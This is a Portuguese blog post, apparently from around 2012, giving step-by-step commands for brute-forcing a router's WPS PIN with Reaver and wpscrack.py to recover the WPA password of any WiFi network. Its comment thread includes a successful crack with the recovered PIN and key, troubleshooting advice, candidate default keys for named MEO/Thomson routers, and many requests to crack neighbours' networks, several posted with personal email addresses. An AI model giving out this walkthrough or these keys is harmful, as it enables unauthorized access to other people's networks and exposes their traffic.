Crackar a password de qualquer rede WiFi WPA em poucas horas!

São bem conhecidas há muitos anos as vulnerabilidades das chaves de rede Wifi WEP no entanto as chaves WPA eram consideradas muito seguras, mesmo praticamente impossíveis de crackar... No entanto isso mudou! Um grupo de e-chicoespertos descobriu um método que torna possível crackar em poucas horas qualquer password com encriptação WPA e mais de 90% dos routers são vulneráveis! Sim o seu router também deve ser vulnerável! porque não o testa?



O método explora uma funcionalidade que surgiu nos routers nos últimos anos para facilitar a configuração da internet nos vários dispositivos que temos em casa chamada "Wifi Protected Setup (WPS)". Se calhar já se cruzou com o WPS quando configura a sua internet no computador e em vez de ter de escrever a password é lhe dada a possibilidade de escrever só um pequeno e prático PIN. Para facilitar a vida as pessoas, a maioria dos routers permite testes sucessivos de "WPS pin" errados sem bloquear o acesso. Este novo método de hack de redes explora essa vulnerabilidade aplicando um ataque "brute force" ao pin, uma vez conseguido este pin o router oferece ao cracker a password da rede WiFi independetemente da qualidade da password usada ou do método de encriptação... Isto permite que a vasta maioria das rede WiFi sejam crackadas em poucas horas (2 a 10h dependendo no programa usado).

Já há programas disponíveis para aplicar facilmente este método e as más notícias para quem quer manter a sua rede segura é que entre os routers vendidos nos últimos anos não há praticamente routers seguros. Desligar a opção de usar o WPS pin não resolve o problema!!!

Quer descobrir se o seu router é vulnerável? Precisa de:
  • Acesso ao sistema operativo Linux (pode executar o linux a partir do windows com uma virtual machine)
  • Precisa de instalar no Linux os seguintes programas: aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev 
  • As ferramentas para WPS crack são: Reaper (suporta todos os routers); wpscrack (mais rápido mas penas suporta algumas marcas de routers que incluem a maioria dos routers usados pela MEO e ZON)
Depois vá um terminal de linha de comando dependendo do programa que vai usar siga esta instruções:

Reaver

  1. unzip reaver-1.3.tar.gz
  2.  cd reaver-1.3
  3. ./configure && make && sudo make install
  4. (Procure a rede que lhe interessa e copie o MAC address  (XX:XX:XX:XX:XX:XX) para depois usar no ponto 6)
    sudo iwlist scan wlan0
  5. sudo airmon-ng start wlan0
  6. reaver -i mon0 -b -vv
  7. Esperar até ter a password...

wpscrack.py

  1. chmod +x wpscrack.py
  2. (Procure a rede que lhe interessa e copie o MAC address  (XX:XX:XX:XX:XX:XX) para depois usar no ponto 5)
    sudo iwlist scan wlan0
  3. ip link show wlan0 | awk ‘/ether/ {print $2}’
  4. sudo airmon-ng start wlan0
  5. wpscrack.py –iface mon0 –client –bssid –ssid -v
  6. Esperar até ter a password...
Como pode ver é muito fácil... uma das coisas que pode fazer para se proteger é limitar o acesso à sua rede apenas aos MAC address dos seus equipamentos configurando isso no setup do router (também é possível tornear mas torna o hack da sua rede mais difícil).

347 comentários:

  1. Anónimo1.5.12

    cool! I demorou mais de um dia num netbook mas resulta!!!! não se esqueçam de meter o MAC address no comando do reaver tipo:
    “reaver -i mon0 -b 00:1B:FC:78:51:96 -vv”

    depois é só esperar e voila!!!

    [+] Sending WSC NACK [+] Pin cracked in 79293 seconds [+] WPS PIN: '15789723' [+] WPA PSK: 'C5609569627D8EEA3334FE3D4C4CD2054EF3A6EE47FCCE5A9E51961177489854' [+] AP SSID: 'default'

    ResponderEliminar
    Respostas
    1. Anónimo10.5.14

      Poderias-me me ajudar? O meu mac adress é: 9c:97:26:8f:39:93
      email: miguel26674lopes@gmail.com

      Eliminar
    2. Anónimo4.10.14

      Alguem me pode ajudar a descobrir a passe desta net??

      Vodafone-E3F743

      Eliminar
    3. Anónimo7.2.15

      existem 3
      D3293BE19A
      D0ABA2B761
      F9A34D2855

      Eliminar
    4. Anónimo7.11.15

      MEO-D6D057
      MEO-457A7B
      ZON-D020
      ZON-2B00
      alguem me pode ajudar aqui com estas redes??

      Eliminar
    5. vodafone-40A20F qual e esta passe

      Eliminar
    6. vodafone-40A20F qual e esta passe

      Eliminar
    7. Anónimo19.11.15

      vodafone-40A20F passe

      Eliminar
    8. Anónimo19.11.15

      qual é a passe pff

      Eliminar
  2. Anónimo16.5.12

    Boas eu sei a MAC address (58:98:35:38:01:28)mas nao tenho sistema linux para descobrir a pass. Poderiam ajudar...

    Obrigado

    ResponderEliminar
  3. Anónimo16.5.12

    Um pequeno errp no anterior Mac ADDRESS: ESTE É O CORRECTO:58:98:35:38:01:2B

    AGRADECIA QUALQUER AJUDA
    luisltteixeira@hotmail.com

    ResponderEliminar
  4. Anónimo4.6.12

    Em vez de estarem todos a pedir da ca a pass oh zon, estudem este post que é a resposta para os codigos de todas as redes!!!

    ResponderEliminar
  5. Anónimo21.6.12

    Ola,encontrei este post e desde ja os meus sinceros agradecimentos.
    A realidade e que sou um completo noob no que respeita a linux mas tenho vontade de aprender, tanto que ja instalei a ultima versao do ubuntu.
    Ja pesquisei imenso mas ainda assim ( e sei que da vossa parte, custa) mas nao custa pedir/perguntar.
    Seria possivel mostrar passo a passo como instalar o tudo correctamente? (aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev) (quais as versoes e tal)

    ResponderEliminar
    Respostas
    1. Anónimo25.1.13

      se queres aprender, n é ubuntu q vais usar... aconselho-te a usares REDHAT (encontras facilmente a ultima versão descontinuada), e qd sentires q já dominas a coisa, saltas p Slackware, te garanto q vais puxar por partes do cerebro q nc pensaste q existiam....

      ah! e esquece gentoo e debian. quem te disser q esses são as distros mais dificeis de usar, está a mentir ou então é noob e passo a explicar:

      - no slackware tens q instalar td à mão, software e dependências. dá luta mas aprendes!
      - no gentoo fazes «emerge nome-do-pacote» e instala-te td sem mexeres um dedo
      - no debian fazes «apt-get install nome-do-pacote» e instala-te td sem mexeres um dedo

      por isso, saca Slackware :)

      Eliminar
    2. Anónimo29.1.15

      088885685

      Eliminar
  6. Anónimo22.6.12

    Ola! Antes demais identifico-me como sendo o autor do ultimo comentário aqui feito. Adianto que já instalei tudo isso mas agora aparece-me sempre isto quando o reaver começa a trabalhar.
    [+] Waiting for beacon from 00:15:AF:EB:4B:3F
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Switching mon0 to channel 12
    [+] Switching mon0 to channel 13
    [+] Switching mon0 to channel 14
    [+] Switching mon0 to channel 1

    Náo sei se está afuncionar correctamente ou não pois passa imenso tempo assim e nunca o vi passar daí.

    ResponderEliminar
    Respostas
    1. Anónimo6.1.13

      Isso siginifica que o reaver não se esta a conseguir associar a estação de wireless.
      O reaver começa a escutar a mac que lhe das, cehgam aparecer essas linhas ate ele identificar em que canal e que o router esta a emitir, assim que identifica o canal, aparece uma linha a dizer associated with station *******, qualquer coisa, a partir dai e começa o brute force.

      Eliminar
  7. Anónimo14.7.12

    ola boa noite alguem me ajuda passes da zon-D1A0 ZON-FDD0 ZON-7402
    ZON-A900 DESDE JA MUITO OBRIGADO SE PODEREM MANDAR PARA O TRINIJON2@GMAIL.COM OBRIGADO

    ResponderEliminar
  8. Anónimo14.7.12

    Este comentário foi removido por um gestor do blogue.

    ResponderEliminar
  9. Anónimo15.9.12

    Podiam me arranjar a password da Zon-1620?

    ResponderEliminar
  10. Anónimo17.9.12

    olá , alguem me podia ajudar por favor para a passe MEO-3A5FBF

    davidguit@hotmail.com

    ResponderEliminar
  11. Não percebo nada destas coisas de descobrir passes, mas tenho uma rede meo-884520, será que alguém me pode ajudar e enviar a passe para esta. m.j.m@clix.pt

    ResponderEliminar
  12. Anónimo23.9.12

    Ola boa noite sou novato nisto alguem me pode dar uma ajuda obrigado

    ResponderEliminar
  13. Anónimo23.9.12

    Ola boa noite alguem me poderia dar uma ajuda com uma rede meu 8F03A1 ja tentei sacar varias passes e nao da o meu mail e mariopt351@gmail.com obrigado

    ResponderEliminar
  14. Anónimo8.10.12

    olá , alguem me podia ajudar por favor para a passe MEO-3975ECC

    Obrigado1

    ResponderEliminar
  15. Anónimo8.10.12

    olá , alguem me podia ajudar por favor para a passe MEO-975ECC
    Obrigado!

    ResponderEliminar
    Respostas
    1. Anónimo3.1.14

      exprimenta a chave 61311DD45A

      Eliminar
  16. Anónimo11.10.12

    Olá a todos.Já testei vários programas para sacar as chaves e grande parte das vezes funcionam. De momento não consigo descobrir a chave do thomson 848B54. Estou desconfiado k é um router MEO com o novo algoritmo. Se alguem me poder ajudar agradeço. Podem enviar a resposta para 69noobsaibot@gmail.com.Estou a tentar descobrir uma forma de dar a volta ao novo algoritmo. Se tiver alguma novidade colocarei no blog.

    ResponderEliminar
    Respostas
    1. Anónimo3.1.14

      pa exprimenta a chave 38F3F9D0EE

      Eliminar
  17. Anónimo13.10.12

    Por favor MEO-79D6D9
    obrigado

    ResponderEliminar
  18. Anónimo13.10.12

    ,,,,,,,,,,,

    ResponderEliminar
  19. Anónimo13.10.12

    MEO-79D6D9

    ResponderEliminar
    Respostas
    1. Anónimo3.1.14

      exprimenta a chave 90D3860699

      isto para o thomson 79D6D9

      Eliminar
  20. Anónimo15.10.12

    Hello, precisava de ajuda nestes redes zon.
    ZON-EC60
    ZON--LM
    ZON-5070

    sita@live.com.pt

    ResponderEliminar
  21. Anónimo19.10.12

    Eu ainda nao consigo instalar os programas no linux, sou mesmo noob nisto :P

    ResponderEliminar
  22. Anónimo25.10.12

    Nao precebo nada deste programa se mostrases um vidio seria muito bem melhor para todos

    ResponderEliminar
    Respostas
    1. Anónimo1.12.12

      procura em youtube , ha muitos , por bactrack 5 with reaver
      cmps

      Eliminar
  23. Anónimo25.10.12

    vAI estudar ó relvas!

    ResponderEliminar
  24. Anónimo25.10.12

    Fixe era alguem que fazer uma app user friendly para o tlm com estes programinhas... eu pagava até 5 euros por uma app dessas :)

    ResponderEliminar
  25. Boas, será possivel me ajudarem com

    ZON -3D3E
    ZON -1A10
    ZON -C370

    tinofoquim@gmail.com

    obrigado

    ResponderEliminar
  26. Ola Boa tarde ; alguem me pode ajudar é que não tenho linux.
    a rede é zon-8A00
    e o mac address (00:05:CA:E:8A:08).

    Mandem para botzip1024@outlook.com

    Obrigada

    ResponderEliminar
    Respostas
    1. Pessoal, não adianta passarem nome das redes e / ou MAC esperando que alguém consiga a senha para vocês, impossível!
      Estamos falando de ambiente WIRELESS, não CABEADA. Ou seja, somente vc caro usuário, que possui sinal da rede poderá interceptá-la para encontrar sua senha.

      Meu conselho é:

      1º - Baixem uma uma distro linux (BACKTRACK 5 por exemplo já vem com os softwares acima, exceto o reaver e a lib);
      2º - Instale-a em dual boot em seu PC ou Máquina Virtual;
      3º - Se não souber nem ao menos instalar uma distro linux, então estude... procure no google, you tube, vá a luta.
      4º - O passo 3º serve também para aprender a instalar o reaver e as lib ;)

      OBS: "Para quem tem vontade realmente de aprender alguma coisa de linux e não possui a mínima noção, aconselho a iniciar pelo UBUNTU 11.10 devido a sua simplicidade, desenvolvimento e seus inúmeros fóruns que existem para sanar suas dúvidas de como iniciar nele..."

      P.S." Nenhuma ajuda no mundo lhe servirá se você não tiver paciência e força de vontade para aprender"

      Sds,

      Tiago Santos

      Eliminar
    2. Anónimo18.7.13

      Concordo em pleno :)
      eu ate ha 3 dias atras n percebia nd de linux ou fazia a minima do que era btrk ou aircrack com esforço e dedicação posso dizer k hoje é algo completamente natural para mim ;)

      Eliminar
    3. Anónimo17.6.15

      Uau Só em tres dias???

      Eliminar
  27. Anónimo12.11.12

    Roda o CD do UBUNTU...

    ResponderEliminar
  28. Não sei trabalhar com isso . Espero que alguem me possa ajudar. Obrigado

    ResponderEliminar
    Respostas
    1. O Google pode! Procure no google algo como:

      - Como instalar ubunto 11.10
      - Como instalar programas linux
      - Iniciando no ubuntu 11.10
      - instalando reaver no (ubuntu, back track ou qualquer outra distro que vc preferir)

      Há muitos e muitos vídeos no you tube que ensinam a trabalhar com estes softwares. Estude...

      Eliminar
  29. Emanuel1.12.12

    Ola Boa tarde ; alguem me pode ajudar é que não tenho linux.
    a rede é zon-5A60
    e o mac address (00:05.CA:C8:5A:68).
    Mandem para nelinho96@hotmail.com
    obrigada

    ResponderEliminar
    Respostas
    1. Anónimo2.12.12

      instala o bactrack 5 no virtualbox, segue as instrucoes do post ou ve uns filmes sobre reaver no youtube

      Eliminar
  30. Anónimo2.12.12

    Boas algem me pode ajudare com a pass de ZON-F9D0 OU cabovisao69

    ResponderEliminar
  31. Anónimo2.12.12

    Boa noite! Alguem me pode ajudar com este por favor?? MEO-A3015D
    Muito muito obrigado! fjpc.coelho@gmail.com

    ResponderEliminar
  32. Anónimo26.12.12

    Ola algem me pode ajudar MEO-86B1E8, Obrigado vagodoce@sapo.pt

    ResponderEliminar
  33. semedo10.1.13

    Será que voces nao entendem que têm de ser voces proprios a estudar alguma maneira de discobrirem as pass que querem?!
    Nao adianta estarem a pedir por aqui!
    Parem de fazer spam com pedidos desse tipo, porque ninguem vai a vossa casa para invadir as redes por voces.
    Limitem-se a estudar e a partilhar a expriencia do assundo deste tópico.
    Ou entao procurem um topico relacionado com pedidos de passwords MEO ou ZON.
    Há um site que é http://www.google.pt/. Procurem, ou estudem uma maneira de conseguirem, nao esperem que o façam por vos.
    ---
    Bom post, assim que poder vou testar.
    cumps!
    (desculpa qualquer coisa. é que é chato estar a ver tanto spam junto mesmo depois de serem "avisados")
    Boa Sorte a Todos.

    ResponderEliminar
    Respostas
    1. Anónimo10.1.13

      Semedo, na verdade sei de fonte segura que há pessoal por aí a ir a casa das pessoas crakar a rede do vizinho... e pessoal dar ou vender passwords wifi por mail..etc...é a crise :-) concordo com o resto do comentário usem os comentários para partilhar conhecimento util relacionado com o post! dúvidas descobertas experiências! ao ppl do blog keep up the good work!

      Eliminar
  34. Anónimo11.1.13

    Viva. Deixo aqui algumas considerações:
    1º Analisa sempre o tipo de protecção!
    1.1 Para WEP ( usa o CommView for WiFi - é o mais simples para quem trabalha em ambiente Windows ) mas tens que ter tráfego para capturar a informação necessária para te dar a palavra-passe!
    1.2 Para WPA :
    1.2.1 Se não sabes o que é reaver -i mon0 -b mac -w , airodump-ng mon0 , airmon-ng start wlan0, então aconselho a usares aqueles programas com algoritmos que "adivinham" as palavras passe pré-definidas. ex: Magiazinha, Da Ca a Pass o Meo! Se tiveres a sorte de o vizinho não mudar a palavra-passe então consegues com alguma facilidade!
    1.2.2 Para aqueles que dominam backtrack, Snifing, Spoofing .. não esquecer que os primeiros 6 digitos do mac do router indicam o fabricante do mesmo!

    ResponderEliminar
  35. Anónimo21.1.13

    90%? em 20 zon e meo,nem 1 que dá.....

    ResponderEliminar
  36. Anónimo18.2.13

    Se nao se importarem Zon-7570 envia para este email musashi.rds@gmail.com

    ResponderEliminar
  37. Anónimo23.2.13

    Podiam me ajudar já tentei de varias maneiras e nao consigo sacar o codigo se me pudessem ajudar agradeço:
    ZON-467C
    ZON-AD40
    ZON-3950

    ResponderEliminar
  38. que linux suporta o i686 (i5 intel)?

    ResponderEliminar
  39. virtual pc apenas emula versão 32bits a menos que esteja ligado na bios! Problema resolvido

    ResponderEliminar
  40. Anónimo18.3.13

    boas sera que haja alguem que me pode ajudar (zon-4260) desde ja o meu muito obrigado

    ResponderEliminar
  41. Anónimo27.3.13

    Boas! :P Podem me fazer um favor de me ajudar a descobrir a password do ZON-A940 e ZON-ECC8.. Se faz favor.. desde já obrigado!

    ResponderEliminar
  42. pessoal nao tenho linux podem me ajudar com zon-17F0 zon-67A0 zon-99A0 obrigado

    ResponderEliminar
  43. Anónimo8.4.13

    quem me pode hackear esta soulhunter89 nunca consegui hackear isto.

    ResponderEliminar
  44. Deixem de ser tontos, a pass não se consegue saber pelo nome de rede, isso era antigamente para os Thompson da MEO mas agora já usam novo algoritmo.

    Não adianta pedirem a senha, ninguém vos consegue dar actualmente.

    Creio também que os operadores actualizaram as firmwares dos routers oficiais para desabilitar o WPS. Se confirmar o que acabei de dizer, mesmo usando o metodo reaver wps deixa de ser possivel aceder à senha.

    Leiam antes de colocar um post às cegas, sejam mais astutos e evoluídos no uso da internet, não é so ler e pedir. Mais vale ir para os sites dos jornais fazer comentários estupidos e trollanços como é habitos do tuga com net.

    ResponderEliminar
  45. Mas será que esta malta que escreve "ajudem..." so sabe escrever mas não aprendeu sequer a lêr? Acham que alguém poderá aqui dar-vos as pass's? A menos que os proprietários dos routter's as disponibilizem terão de ser vocês mesmo a fazer esse trabalho. Eu não fiz este processo mas farei esta semana pois para quem consegue criar um servidor de jogo atraves do virtualpc isto também não será nada do outro mundo... Leiam antes de postar pois não é o pessoal daqui que terá de ir as vossas casas, levar as suas maquinas para descobrir as pass's individualmente... Se eu necessitar de ajuda ca postarei algo, mas postarei também assim que tenha obtido as pass's dos routter's depois de seguir as orientações aqui colocadas. Otimo topico!!!

    ResponderEliminar
  46. alguem me poderia dizer a pass do ZON-0A90 sff????
    obg

    ResponderEliminar
  47. BOA TARDE ALGUEM PODERIA DIZER PASS MEO BC2131 ORG

    ResponderEliminar
  48. pass para rede meo wifi dou em troca uma da zoon free.

    ResponderEliminar
  49. Anónimo7.6.13

    ola boa tarde alguem me poderia dizer a pass da zonF724? e zonEdf0
    desde ja agradeco a atençao e muito obrigado
    david_monteiro1@hotmail.com

    ResponderEliminar
  50. Anónimo10.6.13

    Ola boa noite.
    Alguem me pode ajudar com estas redes?
    ZON-AF14
    ZON-5800
    ZON-1680
    Se alguém me poder ajudar agradecia muito.
    esta aqui o meu mail
    lcts2009@hotmail.com
    obrigado

    ResponderEliminar
  51. Anónimo17.6.13

    Boa tarde, alguem me podia ajudar a descobrir as pass destas meos

    Arieira----segurança wep

    MEO-ARAUJO
    MEO-CASA
    MEO-93EAE0
    segurança de todas wpa2-psk

    Agradeço quem me ajudar

    ResponderEliminar
  52. Tenho o Mac Adress pode-me descodificar por favor?

    deixo aqui o Mac: 58:98:35:BC:F8:6E

    Obrigado desde já !

    ResponderEliminar
  53. alguem me poderia dizer apass
    zon-5780
    zon-A4B0
    podem enviar pro meu mail
    carlos.j.lucas@gmail.com

    ResponderEliminar
  54. Alguem podia-me arranjar a pass da zon 14D0
    Enviem para Xneves_avfc@hotmail.com
    obrigado

    ResponderEliminar
  55. Anónimo22.7.13

    [+] Waiting for beacon from xx:xx:xx:xx:xx:xx
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Switching mon0 to channel 12
    [+] Switching mon0 to channel 13
    [+] Switching mon0 to channel 14
    [+] Switching mon0 to channel 1

    dá-me sempre isto, como resolver?
    como associar à estação?

    ResponderEliminar
  56. Beatriz Lamy27.7.13

    Olá pessoal! Por favor, ajudem-me, eu não percebo nada do que tem que se fazer ! Será que alguma alma caridosa me pode descobrir a passe da net MEO-BCBB0C?? Ajudem-me pessoal, não custa nada! Eu não percebo nadinha disto ://
    Pf quem me ajudar envie para beatriz.lamy@hotmail.com
    Muito obrigada, e façam-me lá este favorzinho, ficarei muito grata :))

    ResponderEliminar
  57. Boas
    Precisava de ajuda para conseguir as pass de
    ZON-D830
    ZON FC20
    ZON 6660
    Desde ja Obrigado

    ResponderEliminar
  58. Anónimo12.9.13

    Boas .
    Precisava de ajuda para conseguir as pass de
    Zon- B9E4
    Zon- A1C0
    Desde ja o meu obrigado

    ResponderEliminar
  59. Anónimo10.10.13

    ola pessoal.senha meo_501832293

    ResponderEliminar
  60. OLA ALGUEM CONSEGUE VER AS DIFERENTES PASS PARA:
    MEO-F3AB37
    JA TENTEI ESTAS TODAS E NAO DEU NENHUMA:
    ChavePossivel 1: ECC46DFBE4x
    ChavePossivel 2: B435599165x

    Year Week Serial WPA(2) Key
    2000 47 CP0047??G9P 5F27AE0DB3x
    2001 05 CP0105??8NX F0A917CF96x
    2007 28 CP0728??W7L D5EA6663A6x
    2008 44 CP0844??2S5 B435599165x
    2011 23 CP1123??7LN 021D9533ACx

    2008
    ACCESSKEY: B435599165x
    2007
    ACCESSKEY: D5EA6663A6x

    TAMBEM ALGUEM CONSEGUE VER PASS'S DA SAPO E/OU CABOVISAO QUE ME POSSAM AJUDAR COM ALGUMA?

    CASO POSSAM AJUDAR-ME AGRADECIA IMENSO... CONTATEM-ME NO E-MAIL SERBUS_@HOTMAIL.COM OU NESTE GMAIL

    CUMPRIMENTOS E MUITISSIMO OBRIGADO!

    ResponderEliminar
  61. Anónimo5.11.13

    Alguem me poderia dizer a pass do ZON-389C??

    Obrigado :) gguedes18@gmail.com

    ResponderEliminar
  62. algum tem ZON-77FO ? Muito obrigado pessoal abraço

    ResponderEliminar
  63. Algum me poderia dizer a pass : ZON-77FO
    obrigado pessoal , abraço

    ResponderEliminar
  64. Anónimo27.12.13

    Alguém me pode arranjar a passou da NET meo-68VZEA?

    ResponderEliminar
  65. Anónimo2.1.14

    Alguém me poderia ajudar com as pass MEO 5A396F OU MEO 9A5E74?

    Obrigado resendes-marcilia@hotmail.com

    ResponderEliminar
  66. Olá-- alguém me pode facilitar pass do ZON-B950 ? Por favor preciso urgentissimo. Obrigado e boa noite a todos..

    ResponderEliminar
  67. Anónimo6.2.14

    Alguém me pode ajudar com a Pass ZON-A660

    Obrigado, riarrou@hotmail.com

    ResponderEliminar
  68. Anónimo6.2.14

    Alguém me pode ajudar a descobrir a Pass:
    ZON-A660
    ZON-1990
    ZON-AE10
    Obrigado: riarrou@hotmail.com

    ResponderEliminar
  69. Anónimo6.2.14

    Alguém me pode ajudar a descobrir a Pass:
    ZON-A660
    ZON-1990
    ZON-AE10
    Obrigado: riarrou@hotmail.com

    ResponderEliminar
  70. Olá a todos, será que me podem ajudar a encontrar as pass VODAFONE-4BBBC3 ou MEO-3931F7 ou ZON-3931F7?
    O meu e-mail:
    anamanatas@gmail.com
    Muito obrigada

    ResponderEliminar
  71. Anónimo16.2.14

    Alguém me pode ajudar a descobrir a passe da Zon-2730?

    ResponderEliminar
  72. Anónimo24.2.14

    Ja tentei o backtrack com o reaver mas tou com dificuldades em arranjar a pass para MEO-457111 fica a fazer loop devido ao ap rate limiter sera k alguem me podia ajudar a dizer a pass sff

    ResponderEliminar
  73. Anónimo25.2.14

    Zon-41A6, alguém tem?

    ResponderEliminar
  74. Anónimo4.3.14

    Boas será k me arranjavan a pass para este mac adress 58:98:35:f4:35:3b
    Obrigado

    ResponderEliminar
  75. Anónimo13.3.14

    GAJOS XATOS.... AO PPL DO SPAM,NINGUEM VAI A VOSSA CASA! POIS SO LA INDO E POSSIVEL DECIFRAR PASSES..! AFF...

    ResponderEliminar
  76. Anónimo26.3.14

    Bom dia, consegue-se arranjar a password e o utilizador para a Meo Wifi Free ?
    Obrigado

    ResponderEliminar
  77. Anónimo28.3.14

    Boas podem-me arranjar a pass deste MAC addres 00:24:17:4B:15:CB
    se conseguirem o meu mail é: antonio62@live.com.pt
    obrigado

    ResponderEliminar
  78. Ola..estou com algumas dificuldades nisto... alguem ajuda sff?!
    ZON-9FB0 ou vodafone-7BC5E5
    Obrigada...

    ResponderEliminar
  79. Anónimo22.4.14

    ola tudo bem? eu nao entendo muito de informática.
    mas se voces souberem como posso descobrir a pass de um destes routers agradecia:
    thomoson7258E7
    zon-2D30

    guru-9@live.com.pt(respondam para aqui)

    ResponderEliminar
  80. Anónimo25.4.14

    esta tecnica ainda funciona com os routers actuais?
    obrigado

    ResponderEliminar
  81. Olá! Será que alguém me pode ajudar com a pass para MEO-850F70
    Obrigada :)

    ResponderEliminar
  82. Anónimo28.4.14

    Olá! Será que alguém sabe dizer a pass de MEO-850F70
    Obrigada!
    Joana

    ResponderEliminar
  83. [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete @ 2014-05-01 17:48:46 (0 seconds/pin)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request

    é normal estar sempre assim ???

    ResponderEliminar
    Respostas
    1. Anónimo17.2.15

      Penso que esse router está a blokear o acesso ou tem o Wps desativado

      Eliminar
  84. Anónimo1.5.14

    Simplesmente ridiculo o facto de andarem a por aqui o nome das redes para conseguirem a password .
    Ao principio ainda havia programas para atravez do nome da rede se conseguir a password por defeito dos routers , mas depois dos ultimos updates aos routers pelos isps , cada vez está mais dificil conseguir arranjar tecnicas para conseguir a chave atravez de ataque wps no linux .
    algumas dicas para que não se consegue associar a uma rede em linux :
    airodump-ng para monitorizar os macaddress ligados há rede , e alterar o seu para esse macaddress
    reaver , bully já quase não teem efeito nos novos routers .
    é mais facil capturar o handshake do cliente ao router e tentar descodifica-lo com o hashcat .

    ResponderEliminar
  85. Alguem pode-me explicar melhor sff
    Obrigado

    ResponderEliminar
  86. alguem me pode saber a pass da ZON-FD80 ?????OU ALGUM MAIL DA ZON FREE?? OBG

    ResponderEliminar
  87. ZON FD80 SE PUDEREM DAR UM HELP FICO GRATA

    ResponderEliminar
  88. Não adianta pedir para te enviar por email que nem mesmo eles sabem, só vocês é que devem conseguir porque:
    1º Precisam de um aparelho
    2º Precisam ter a certeza que alguém está ligada à rede via wireless onde querem a password
    3º Precisam um dicionário de password
    Evitem de comentar porque ninguém vai vos dar a passwords ;)
    adeus

    ResponderEliminar
  89. Anónimo2.9.14

    MEO-F5E2A9

    Chaves possíveis?
    Os últimos 6 carateres do mac adress são estes colocados em cima.
    Obrigado!

    ResponderEliminar
  90. Anónimo6.9.14

    ALGUEM ME PODE AJUDAR PARA MEO-7D24BD. MEO-79EB8F?

    PARDAL-RUNA_@HOTMAIL.COM

    ResponderEliminar
  91. Anónimo7.9.14

    Bolas ...vai lá vai...!! e pensava eu que era um «cyber-burro», até eu já percebi que tem que se ir estudar o ubuntu e aprender a mexer com esses Sist Operativos e depois aprender a trabalhar com os programas de descodificação de pass´s ...vou fazer isso e ver os tutoriais do youtube...e vou aprender alguma coisa decerteza...

    ResponderEliminar
  92. Anónimo18.9.14

    Olá será que me podem arranjar a pass para a zon?
    Zon-E890
    Zon-5E60
    Zon-4D70
    jorgemsassuncao@gmail.com

    ResponderEliminar
  93. Anónimo20.9.14

    pips tou a tentar sacar aqui dum zon. com feeding bottle....aquilo depois chea ali a uma parte pede pra escolher o dicionario e o que vem ja abri o file e bem em chinês lol saquei ai um outro dicionário e com o ultraISO editei o Isofile para depois conseguir ter acesso a ele...mas tou aqui com uma duvida se isto ira mesmo funcionar ja q nao percebo bem como funciona a coisa: essas passes da ZON e afins costumam ser coisas do tipo: "adfstsre34enbx" será q o dicionario que em principio tera palavras certo? (ainda nao abri é bue big o ficheiro) vai descobrir uma pass q não é uma palavra mas sim um conunto de letras sem nexo??
    desculpem a minha ignorancia bruta

    ResponderEliminar
    Respostas
    1. Anónimo17.2.15

      A pass tem que estar no dicionário se estiver mostra te a pass certa. Já agora onde sacastes o dicionario? Saquei muitos mas é em ingles. Qualquer coisa softel2010@hotmail.com

      Eliminar
  94. Anónimo24.9.14

    Boa noite... Password da MEO-9B46AE ? já tentei este método mas nao está a resultar... agradecia imenso

    ResponderEliminar
  95. Anónimo3.10.14

    Vao trabalhar...

    ResponderEliminar
  96. Amigos,
    Pass para o Thom_D012690?

    ResponderEliminar
  97. Boas, pessoal alguem me consegue arranjar a pass dos seguintes routers:

    MEO-3A84E3
    MEO-8CEC73

    É URGENTE—–

    obRIGADO

    ResponderEliminar
  98. Anónimo24.10.14

    pass Cabovisao-DB5A

    ResponderEliminar
  99. Password para optimus wifi d383?

    ResponderEliminar
  100. Anónimo1.11.14

    pode-me dizer qual e a palavra-passe da internet ADSLPT-AB29605
    se faz favor

    ResponderEliminar
  101. Anónimo6.11.14

    Bom dia a todos. Tenho tentado e aínda não consegui a chave de MEO-9A340E
    Será que alguém me pode ajudar?
    joao555valente@hotmail.com
    Obrigado.

    ResponderEliminar
  102. Seria possivel dar me a password da Zon 04CO obrigada

    ResponderEliminar
  103. cabovisao-0AE8 sff smiguel.reis@gmail.com

    ResponderEliminar
  104. cabovisao-0AE8 sff

    smiguel.reis@gamil.com

    ResponderEliminar
  105. Luís Sampaio14.11.14

    Alguem me consegue ajudar?

    Vodafone-8E8BBD

    ResponderEliminar
  106. Anónimo24.11.14

    boas esta ai alguém que me posso ajudar?? com umas passes?

    ResponderEliminar
  107. Anónimo1.12.14

    boa tarde,alguem me pode ajudar a descobrir as senhas destes routers O EMAIL É: renatosimoes1979@gmail.com
    MEO-DC8773
    MEO-DA67DB

    ResponderEliminar
  108. Anónimo1.12.14

    Ola, conseguem ajudar a descobrir esta rede: ZON-8380
    Enviem para o email: Leozone_87@hotmail.com

    ResponderEliminar
  109. Anónimo7.12.14

    Olá! Será que alguém sabe dizer a pass de Vodafone-A1E953
    Vodafone-B6456B

    Obrigada
    Patricia

    Fernandojorge98@hotmail.com

    ResponderEliminar
  110. Alguem me poderia ajudar com a pass desta net?

    Vodafone-958933

    Obrigado

    ResponderEliminar
  111. Anónimo17.12.14

    Oh meus amigos, atao n perceberam, a
